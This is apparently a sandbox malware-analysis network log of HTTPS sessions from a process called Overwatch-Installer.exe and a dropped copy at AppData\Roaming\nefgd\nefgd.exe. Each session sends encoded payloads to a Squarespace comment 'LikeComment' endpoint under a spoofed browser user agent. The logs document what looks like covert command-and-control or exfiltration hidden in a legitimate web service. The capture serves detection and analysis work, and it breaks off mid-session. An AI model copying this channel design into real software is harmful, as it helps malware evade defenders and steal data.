2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9iRmcu3fuJ%2BWJCeJhHCLRJQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7M
2024-09-01 20:04:32 UTC	1	OUT	Data Raw: 6f Data Ascii: o
2024-09-01 20:04:32 UTC	16306	OUT	Data Raw: 78 35 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 Data Ascii: x5%2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BC
2024-09-01 20:04:32 UTC	1	OUT	Data Raw: 75 Data Ascii: u
2024-09-01 20:04:32 UTC	16306	OUT	Data Raw: 56 37 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 Data Ascii: V7HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMts
2024-09-01 20:04:32 UTC	1	OUT	Data Raw: 5a Data Ascii: Z
2024-09-01 20:04:32 UTC	16306	OUT	Data Raw: 36 4d 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 Data Ascii: 6MOG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtef
2024-09-01 20:04:32 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:32 UTC	16306	OUT	Data Raw: 42 36 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 Data Ascii: B6ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rW
2024-09-01 20:04:32 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:32 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbtW48FClaxSNWJmYjg5N2JiNWYyNjcwNWNjZTM5MWI2YjExZGU0; Path=/; Secure Set-Cookie: crumb=BTIwPoMr4Jr-YjQyNTYzMmVhYjQ4NTQ1MzhiNGYxMjRjMTU5Zjlm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: uHYIoddE/qWc8ykvP Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTIwPoMr4Jr-YjQyNTYzMmVhYjQ4NTQ1MzhiNGYxMjRjMTU5Zjlm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49760	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:32 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:32 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:32 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 46 39 52 55 52 6c 64 44 5a 6c 31 6d 77 41 51 44 36 56 46 64 52 36 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2F9RURldDZl1mwAQD6VFdR6if6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:32 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:32 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Ba6jjXS0VzDtNTcwMTk4ZTg0M2ZmZTdkZDlmMWI5YzRmOGRkNTY1; Path=/; Secure Set-Cookie: crumb=BZUglJL7kwYmMmY2ZDI3MjI2Njc3Y2UwZTAzMjUwYjEwMzYwZDNk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: IrWeaRbS/ZB5aHwMK Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZUglJL7kwYmMmY2ZDI3MjI2Njc3Y2UwZTAzMjUwYjEwMzYwZDNk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49761	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:33 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:33 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:33 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:33 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:33 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRepBB9w5kKYZjNmZTc3NjhmNjI1YjhjMTQ5ODA0MmEyNWYyN2Ex; Path=/; Secure Set-Cookie: crumb=BT13wOTjWTAVZmRmNGUzZGRkYzY4M2NmMzMwZDQ3ZGYzM2IyMTA5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: R5DqTwSX/ljRbiilu Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BT13wOTjWTAVZmRmNGUzZGRkYzY4M2NmMzMwZDQ3ZGYzM2IyMTA5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49762	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:33 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:33 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:33 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:33 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:33 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcwKQCpoBimSZTJkMDIzMjIxMDhjZWI3NTEzNzJhYjdmM2JhMGU5; Path=/; Secure Set-Cookie: crumb=BTAmQliulGiKYjk4Mzg4MDVhZDE5N2NhMDY3ZjgzNDgzZWZlNGI3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 26ZAFYpg/csLazsc5 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTAmQliulGiKYjk4Mzg4MDVhZDE5N2NhMDY3ZjgzNDgzZWZlNGI3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49763	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:33 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:34 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:34 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:34 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:33 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZUFS6kHLNK9ZTA4YjZkYzJlNTBlMGE0ZTk2ZmQzNjJkZWFjMTBm; Path=/; Secure Set-Cookie: crumb=Ba1_fpKtnC1qZDgyYmE4YzRiMWUzYmQ4ZTdhMjI0OTBjODFlNWJm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 9eg5Q6GL/nvmm5Us0 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Ba1_fpKtnC1qZDgyYmE4YzRiMWUzYmQ4ZTdhMjI0OTBjODFlNWJm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49764	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:33 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:34 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:34 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:34 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:33 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUJRei8DDrnEYzczMzc4NzY1ZDY4NmI1YmIyYzFiNDMzNjU0NTc5; Path=/; Secure Set-Cookie: crumb=BQArgBuGgm3tNDgzZTIyZWY5ZTU2ZDZlNzJmZDAwNTVmYzQzYzNk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 5hZZ20IX/KxT4JX5C Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQArgBuGgm3tNDgzZTIyZWY5ZTU2ZDZlNzJmZDAwNTVmYzQzYzNk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49765	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:34 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:34 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:34 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:34 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:34 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BU6CxlfV_jZMZDIyZWFhZjgwYzdlNWQxZDE0NzY0N2ViNzVhOTVk; Path=/; Secure Set-Cookie: crumb=BZk9JW-RUiUgNWE5MDAzYjk4OWU2NTFkNTgzZTgzOWRhMzNjZjI4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: XG974eHT/qOVxBB2A Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZk9JW-RUiUgNWE5MDAzYjk4OWU2NTFkNTgzZTgzOWRhMzNjZjI4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49766	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:34 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:34 UTC	1	OUT	Data Raw: 70 Data Ascii: p
